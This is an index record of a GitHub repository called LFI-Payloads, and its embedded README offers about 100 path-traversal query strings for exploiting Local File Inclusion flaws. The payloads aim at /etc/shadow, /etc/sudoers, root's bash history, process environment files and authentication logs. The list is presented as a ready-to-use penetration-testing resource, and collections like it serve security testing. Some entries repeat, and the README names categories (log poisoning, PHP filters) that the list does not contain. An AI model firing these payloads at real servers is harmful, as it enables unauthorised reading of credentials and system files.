{"id":26347219,"url":"https://github.com/yogsec/lfi-payloads","last_synced_at":"2026-01-03T06:08:31.674Z","repository":{"id":281945607,"uuid":"946967373","full_name":"yogsec/LFI-Payloads","owner":"yogsec","description":"LFI Payloads - A comprehensive collection of Local File Inclusion (LFI) payloads for security researchers and penetration testers. This repository includes common, advanced, and bypass techniques to help identify and exploit LFI vulnerabilities effectively.","archived":false,"fork":false,"pushed_at":"2025-03-12T01:04:39.000Z","size":0,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-12T01:27:33.764Z","etag":null,"topics":["bug-bounty-cheatsheet","bug-hunting-tools","cybersecurity","cybersecurity-cheatsheet","cybersecurity-payloads","lfi-payload","lfi-payloads","lfi-payloads-list","local-file-inclusion","local-file-inclusion-payloads"],"latest_commit_sha":null,"homepage":"https://linktr.ee/yogsec","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yogsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["yogsec"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"lfx_crowdfunding":null,"polar":null,"buy_me_a_coffee":null,"thanks_dev":null,"custom":null}},"created_at":"2025-03-12T00:32:31.000Z","updated_at":"2025-03-12T01:04:43.000Z","dependencies_parsed_at":"2025-03-12T01:37:36.793Z","dependency_job_id":null,"html_url":"https://g
ithub.com/yogsec/LFI-Payloads","commit_stats":null,"previous_names":["yogsec/lfi-payloads"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yogsec%2FLFI-Payloads/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yogsec","download_url":"https://codeload.github.com/yogsec/LFI-Payloads/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243835926,"owners_count":20355616,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty-cheatsheet","bug-hunting-tools","cybersecurity","cybersecurity-cheatsheet","cybersecurity-payloads","lfi-payload","lfi-payloads","lfi-payloads-list","local-file-inclusion","local-file-inclusion-payloads"],"created_at":"2025-03-16T07:16:15.469Z","updated_at":"2026-01-03T06:08:31.669Z","avatar_url":"https://github.com/yogsec.png","language":null,"funding_links":["https://github.com/sponsors/yogsec"],"categories":[],"sub_categories":[],"readme":"# 🚀 LFI Payloads\n\nWelcome to **LFI Payloads**! This repository is designed to help security researchers and penetration testers identify and exploit **Local File Inclusion (LFI)** vulnerabilities with effective payloads. 
🛡️\n\n---\n\n## 📂 What is LFI?\n**Local File Inclusion (LFI)** is a web vulnerability that allows an attacker to include files on a server through the web browser. This can potentially lead to:\n\n- 🕵️‍♂️ Information Disclosure\n- 🐍 Code Execution\n- 🔥 Server Compromise\n\n---\n\n## 📜 Payloads\nThis repository contains various payloads categorized for easy access:\n\n✅ **Basic Payloads**  \n✅ **Encoding Techniques**  \n✅ **Traversal Techniques**  \n✅ **Wrapper Bypass**  \n✅ **PHP Filters**  \n✅ **Log Poisoning Payloads**\n\n### 🔥 100 Common LFI Payloads\n```\n?page=../../../../etc/passwd\n?page=../../../../etc/hosts\n?page=../../../../windows/win.ini\n?page=../../../../boot.ini\n?page=../../../../etc/shadow\n?page=../../../../etc/group\n?page=../../../../proc/self/environ\n?page=../../../../var/log/apache2/access.log\n?page=../../../../var/log/apache2/error.log\n?page=../../../../var/log/httpd/access.log\n?page=../../../../var/log/httpd/error.log\n?page=../../../../usr/local/apache/logs/access_log\n?page=../../../../usr/local/apache/logs/error_log\n?page=../../../../var/lib/mysql/mysql.sock\n?page=../../../../etc/httpd/httpd.conf\n?page=../../../../etc/apache2/apache2.conf\n?page=../../../../etc/httpd/conf/httpd.conf\n?page=../../../../etc/httpd/conf.d/vhosts.conf\n?page=../../../../etc/nginx/nginx.conf\n?page=../../../../etc/nginx/sites-enabled/default\n?page=../../../../etc/ssl/openssl.cnf\n?page=../../../../var/www/html/index.php\n?page=../../../../home/user/.bash_history\n?page=../../../../root/.bash_history\n?page=../../../../etc/issue\n?page=../../../../etc/network/interfaces\n?page=../../../../etc/resolv.conf\n?page=../../../../etc/hostname\n?page=../../../../etc/hosts.allow\n?page=../../../../etc/hosts.deny\n?page=../../../../etc/s
ecurity/opasswd\n?page=../../../../etc/mtab\n?page=../../../../etc/fstab\n?page=../../../../etc/sudoers\n?page=../../../../etc/pam.conf\n?page=../../../../etc/profile\n?page=../../../../etc/shells\n?page=../../../../etc/inittab\n?page=../../../../etc/passwd-\n?page=../../../../etc/group- \n?page=../../../../etc/shadow- \n?page=../../../../etc/gshadow- \n?page=../../../../var/backups/passwd\n?page=../../../../var/backups/group\n?page=../../../../var/backups/shadow\n?page=../../../../var/backups/gshadow\n?page=../../../../dev/mem\n?page=../../../../dev/kmem\n?page=../../../../dev/port\n?page=../../../../proc/mounts\n?page=../../../../proc/partitions\n?page=../../../../proc/version\n?page=../../../../proc/self/status\n?page=../../../../proc/self/cmdline\n?page=../../../../proc/self/fd\n?page=../../../../proc/self/maps\n?page=../../../../proc/self/mountinfo\n?page=../../../../proc/self/io\n?page=../../../../proc/self/limits\n?page=../../../../proc/self/cgroup\n?page=../../../../proc/self/net/tcp\n?page=../../../../proc/self/net/udp\n?page=../../../../proc/self/net/raw\n?page=../../../../proc/self/net/unix\n?page=../../../../proc/self/net/snmp\n?page=../../../../proc/self/net/dev\n?page=../../../../proc/self/net/ip_conntrack\n?page=../../../../proc/self/net/route\n?page=../../../../proc/self/net/arp\n?page=../../../../proc/self/net/fib_trie\n?page=../../../../proc/self/net/netfilter\n?page=../../../../var/run/utmp\n?page=../../../../var/log/wtmp\n?page=../../../../var/log/btmp\n?page=../../../../var/log/lastlog\n?page=../../../../var/run/utmpx\n?page=../../../../var/log/wtmpx\n?page=../../../../var/log/btmpx\n?page=../../../../var/log/faillog\n?page=../../../../var/log/auth.log\n?page=../../../../var/log/secure\n?page=../../../../var/log/messages\n?page=../../../../var/log/syslog\n?page=../../../../var/log/kern.log\n?page=../../../../var/log/maillog\n?page=../../../../var/log/yum.log\n?page=../../../../var/log/dpkg.log\n?page=../../../../var/log/apt/history.log\n?page=..
/../../../var/log/apt/term.log\n?page=../../../../var/log/aptitude\n?page=../../../../var/log/boot.log\n?page=../../../../var/log/cron\n?page=../../../../var/log/daemon.log\n?page=../../../../var/log/debug\n?page=../../../../var/log/lpr.log\n?page=../../../../var/log/user.log\n?page=../../../../var/log/xferlog\n?page=../../../../var/log/mail.info\n?page=../../../../var/log/mail.warn\n?page=../../../../var/log/mail.err\n?page=../../../../var/log/httpd/access.log\n?page=../../../../var/log/httpd/error.log\n?page=../../../../var/log/apache2/access.log\n?page=../../../../var/log/apache2/error.log\n```\n\n---\n\n## ⚙️ Usage\n1. Clone the repository:\n   ```bash\n   git clone https://github.com/yogsec/LFI-Payloads.git\n   ```\n2. Navigate to the folder:\n   ```bash\n   cd LFI-Payloads\n   ```\n3. Use the categorized payloads as per your testing requirements.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Flfi-payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyogsec%2Flfi-payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyogsec%2Flfi-payloads/lists"}